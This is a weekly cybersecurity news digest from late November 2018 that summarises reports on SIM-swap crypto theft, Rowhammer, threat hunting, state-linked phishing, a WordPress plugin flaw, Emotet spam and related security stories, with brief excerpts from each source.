Threats & Defense – The Week’s Best News – 2018.11.26

A Review of the Best News of the Week on Cyber Threats & Defense

The phone went dark, then $1m was sucked out in SIM-swap crypto-heist (Naked Security – Sophos, Nov 26 2018)
A Silicon Valley exec lost $1m in cryptocoin savings when a 21-year-old allegedly SIM-swapped his phone.

Rowhammer Data Hacks Are More Dangerous Than Anyone Feared (Wired, Nov 21 2018)
Rowhammer attacks are fiendishly technical. They involve strategically executing a program over and over on a “row” of transistors in a computer’s memory chip. The idea is to “hammer” that row, until it leaks some electricity into the adjacent row. That leakage can cause a bit in the target row to “flip” from one position to another, slightly altering the data stored in memory. A skilled Rowhammer attacker can then start to exploit these tiny data changes to gain more system access. See? It’s pretty bonkers.

More on Threat Hunting (TaoSecurity, Nov 24 2018)
Earlier this week hellor00t asked via Twitter: Where would you place your security researchers/hunt team? I replied: For me, “hunt” is just a form of detection. I don’t see the need to build a “hunt” team. IR teams detect intruders using two major modes: matching and hunting. Junior people spend more time matching. Senior people spend more time hunting. Both can and should do both functions.


Compliance is necessary. Wasting money isn’t.
The Mosaic Security Research Market Intelligence Platform provides the tools you need for OWASP’s Cyber Defense Matrix. Build your threat defense systematically.


Even More on Threat Hunting (TaoSecurity, Nov 24 2018)
Do you consider detection through ID’ing/“matching” TTPs not hunting? To answer this question, we must begin by clarifying “TTPs.” Most readers know TTPs to mean tactics, techniques and procedures, defined by David Bianco in his Pyramid of Pain post as: How the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between.

Information Attacks against Democracies (Schneier on Security, Nov 21 2018)
Democracy is an information system. That’s the starting place of our new paper: “Common-Knowledge Attacks on Democracy.” In it, we look at democracy through the lens of information security, trying to understand the current waves of Internet disinformation attacks. Specifically, we wanted to explain why the same disinformation campaigns that act as a stabilizing influence in Russia are destabilizing in the United States.

U.S. Push on Huawei Ripples Through Markets (WSJ, Nov 26 2018)
ZTE shares fell sharply and Chinese stocks retreated more broadly as news that the U.S. was discouraging sales of Chinese telecoms gear abroad exacerbated trade concerns.

Attackers Are Landing Email Inboxes Without the Need to Phish (SecurityWeek, Nov 23 2018)
Traditionally, social engineering and intrusion techniques have been the most common ways to gain access to business email accounts and dupe individuals to wire funds to an attacker-controlled account.

6,500 Dark Web Sites Offline After Hosting Service Attacked (Dark Reading, Nov 20 2018)
The actor behind the attack on Daniel’s Hosting, and their initial point of entry, remain unknown.

UK Government Failing on CNI Security, Say MPs (Infosecurity Magazine, Nov 20 2018)
Committee criticizes lack of leadership at the top

Flash Player Update Patches Disclosed Code Execution Flaw (SecurityWeek, Nov 20 2018)
Security updates released on Tuesday by Adobe for Flash Player address a critical vulnerability whose details were disclosed a few days earlier.

Iran-Linked Hackers Use Just-in-Time Creation of Weaponized Attack Docs (SecurityWeek, Nov 19 2018)
The attacks targeted individuals of interest with malicious documents designed to deliver BONDUPDATER, a downloader that features DGA (domain generation algorithm) functionality. The attacks were carried out on August 26 and the threat actor created numerous delivery documents the week before, to test anti-virus detection rates.

Russia’s Fancy Bear and Cozy Bear Hackers May Have New Phishing Tricks (Wired, Nov 20 2018)
Two new reports show an uptick in sophisticated phishing attacks originating from—where else—Russia.

Hackers target critical WordPress plugin flaw to install backdoors and create admin accounts (Graham Cluley, Nov 21 2018)
The flaw existed in a version of the AMP for WP – Accelerated Mobile Pages plugin, designed to make webpage load faster on mobile devices. AMP for WP mysterious disappeared from the official WordPress plugin repository on 21 October, with its 100,000+ users greeted with a message saying: “This plugin was closed on October 21, 2018 and is no longer available for download.”

Paper Trail Absence May Still Plague 2020 Election (Dark Reading, Nov 26 2018)
The recommendation for paper ballots may go unheeded in all or part of at least 6 states in the next national election.

Are we chasing the wrong zero days? (Help Net Security, Nov 26 2018)
Within the critical infrastructure sectors, the human risk factor seem to be going unnoticed. This is evidenced by a series of events that have taken place over the past couple of years.

Internal negligence to blame for most data breaches involving personal health information (Help Net Security, Nov 26 2018)
The research, published in JAMA Internal Medicine, follows the joint 2017 study that showed the magnitude of hospital data breaches in the United States. The research revealed nearly 1,800 occurrences of large data breaches in patient information over a seven years, with 33 hospitals experiencing more than one substantial breach.

Reddit helps admin solve mystery of rogue Raspberry Pi (Naked Security – Sophos, Nov 22 2018)
Finding a mysterious circuit board plugged into a network that you are tasked with managing is always going to be a disconcerting moment for any sysadmin.

DoS Vulnerabilities Impact Linux Kernel (SecurityWeek, Nov 26 2018)
Two recently disclosed Linux kernel vulnerabilities that remain unpatched could be exploited for local denial-of-service (DoS).

Black Friday special by Emotet: Filling inboxes with infected XML macros (WeLiveSecurity, Nov 23 2018)
Emotet starts another massive spam campaign just as Black Friday begins to pick up steam

How to Shop Online Like a Security Pro (Krebs on Security, Nov 23 2018)
“Here’s a quick refresher course on how to make it through the next few weeks without getting snookered online.”

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn